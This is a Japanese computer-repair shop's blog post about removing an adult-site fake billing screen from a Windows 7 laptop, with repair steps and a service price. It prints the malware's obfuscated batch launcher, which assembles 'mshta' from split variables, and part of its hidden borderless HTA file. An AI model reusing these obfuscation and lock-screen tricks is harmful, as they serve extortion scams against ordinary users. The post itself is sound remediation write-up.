« NEC LL750/G ウィルス「Disk Antivirus Professional」の駆除。 | トップページ | NEC LL550/R 「Disk Antivirus Professional」の駆除。 »

2013年2月23日 (土)

アダルトサイトの請求画面削除。

本日のトラブルはタイトル通りの

「アダルトサイトの請求画面」の削除依頼です。

岐阜県からの宅配修理依頼です。

Img_5907

問題のパソコンは東芝 dynabook B351/W2FC Windows7です。

電源を入れると

Img_5916

Img_5918

デスクトップに張り付いています。

早速HijackThisでログを採取。

Img_5919

ProgramDateフォルダ内に067H94MYという名前のバッチファイルが埋め込まれています。

最近のはhtaファイルを使ったものが殆どですので珍しいです。

該当ファイルのプロパティを確認してみると

Img_5920

ファイルの作成日時が発症日時と一致していますので間違い無さそうです。

試しに067H94MYファイルをテキストで開いて確認してみました。

@ECHO OFF
SET b=s
REM
SET c=h
REM
SET d=t
REM
SET e=a
REM
SET a=m
start %a%%b%%c%%d%%e% "C:\ProgramData\lkgol\067H94MY.h"

C:\ProgramData\lkgol\067H94MY.hを実行するようにプログラムされています。
067H94MY.hファイルを確認してみると

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=shift-jis">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow">
<script type="text/JavaScript">
b='window.'+'move'+'To';
eval(b +"(174256-175256,174256-175256)");
</script>
<HTA:APPLICATION
    ID="idH"
    BORDERSTYLE="none"
    SCROLL="no"
    CONTEXTMENU="no"
    SHOWINTASKBAR="0" />
<title>ご利用確認完了のお知らせ画面</title>

途中までですがhtmlファイルで不正サイトにアクセスするようにスクリプトされています。
画像はサイトにアクセスして表示させているようです。

早速レジストリと該当ファイルをフォルダごと削除。

タスクでその他にスケジュールされていないか確認。

今回は問題ありませんでした。

そして再起動。

Img_5923

ネットに接続して様子を見ましたが表示される事はありません。

最後に再発しないように「システムの復元」の復元ポイントを削除。

Img_5922

以上で作業完了です。

この手のトラブルはお客様のご都合もありますので即日に発送させて頂きました。

当社では「アダルトサイトの請求画面」の削除は基本的にはその場で可能です。

お困りの方はご相談ください。

間違っても先方に支払ったり連絡など取らないようにお願いします。

アダルトサイトの請求画面削除 ¥8,000-

人気blogランキングに登録しました。クリックご協力ください。

人気blogランキングへ

パソコン修理・トラブルサポートはPCRサービスまで!!

宅配修理もお受け致します。PCRサービス宅配修理サービス

お問合せはこちら

|

« NEC LL750/G ウィルス「Disk Antivirus Professional」の駆除。 | トップページ | NEC LL550/R 「Disk Antivirus Professional」の駆除。 »

コメント

コメントを書く



(ウェブ上には掲載しません)


コメントは記事投稿者が公開するまで表示されません。



トラックバック


この記事へのトラックバック一覧です: アダルトサイトの請求画面削除。:

« NEC LL750/G ウィルス「Disk Antivirus Professional」の駆除。 | トップページ | NEC LL550/R 「Disk Antivirus Professional」の駆除。 »